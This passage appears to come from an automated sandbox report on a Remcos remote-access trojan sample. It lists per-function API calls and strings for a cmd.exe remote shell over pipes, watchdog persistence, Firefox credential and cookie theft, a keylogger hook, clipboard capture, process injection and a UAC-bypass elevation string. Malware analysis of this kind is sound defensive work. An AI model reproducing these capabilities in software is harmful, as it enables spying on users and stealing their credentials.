                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                  • CloseHandle.KERNEL32 ref: 00405A23
                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                  • CloseHandle.KERNEL32 ref: 00405A45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                  • API String ID: 2994406822-18413064
                                  • Opcode ID: 263f862d2a4e5ab39b8f277b163e5cfdff8eedff8f4ffa8a5c5ab1abbd34aa3f
                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                  • Opcode Fuzzy Hash: 263f862d2a4e5ab39b8f277b163e5cfdff8eedff8f4ffa8a5c5ab1abbd34aa3f
                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                  Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                  • API String ID: 3018269243-13974260
                                  • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                  • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                  Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 1164774033-3681987949
                                  • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                  • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                  Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenClipboard.USER32 ref: 004168FD
                                  • EmptyClipboard.USER32 ref: 0041690B
                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                  • CloseClipboard.USER32 ref: 00416990
                                  • OpenClipboard.USER32 ref: 00416997
                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                  • CloseClipboard.USER32 ref: 004169BF
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                  • String ID: !D@
                                  • API String ID: 3520204547-604454484
                                  • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                  • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                  Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Close$File$FirstNext
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 3527384056-432212279
                                  • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                  • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                  Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                  • API String ID: 489098229-1431523004
                                  • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                  • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                  Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                  • API String ID: 3756808967-1743721670
                                  • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                  • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                  Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                  • API String ID: 0-1861860590
                                  • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                  • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                  Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 0040755C
                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Object_wcslen
                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                  • API String ID: 240030777-3166923314
                                  • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                  • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                  Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                  • GetLastError.KERNEL32 ref: 0041A84C
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                  • String ID:
                                  • API String ID: 3587775597-0
                                  • Opcode ID: a103e76dbcfb3da65abf4833947f0e746439e5ab83e6bce2808fe49156252710
                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                  • Opcode Fuzzy Hash: a103e76dbcfb3da65abf4833947f0e746439e5ab83e6bce2808fe49156252710
                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                  Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                  • String ID: JD$JD$JD
                                  • API String ID: 745075371-3517165026
                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                  Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 1164774033-405221262
                                  • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                  • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                  Function 0040A2F3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                  • GetLastError.KERNEL32 ref: 0040A328
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                  • TranslateMessage.USER32(?), ref: 0040A385
                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                  • String ID: Keylogger initialization failure: error $`#v
                                  • API String ID: 3219506041-3226811161
                                  • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                  • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                  Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                  • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 2341273852-0
                                  • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                  • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                  Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Find$CreateFirstNext
                                  • String ID: 8SG$PXG$PXG$NG$PG
                                  • API String ID: 341183262-3812160132
                                  • Opcode ID: 5584b3d18adbed3091afe8ba58a2a7bcfc961150b038985754328bafed151b69
                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                  • Opcode Fuzzy Hash: 5584b3d18adbed3091afe8ba58a2a7bcfc961150b038985754328bafed151b69
                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                  Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 0040A451
                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                  • GetKeyboardState.USER32(?), ref: 0040A479
                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                  • String ID:
                                  • API String ID: 1888522110-0
                                  • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                  • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                  Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                  • API String ID: 2127411465-314212984
                                  • Opcode ID: 09788986c499ccf61a32fa2fa99dcd6ee3d0b3087326da66d508dcd15781bba8
                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                  • Opcode Fuzzy Hash: 09788986c499ccf61a32fa2fa99dcd6ee3d0b3087326da66d508dcd15781bba8
                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                  Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00449292
                                  • _free.LIBCMT ref: 004492B6
                                  • _free.LIBCMT ref: 0044943D
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                  • _free.LIBCMT ref: 00449609
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                  • String ID:
                                  • API String ID: 314583886-0
                                  • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                  • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
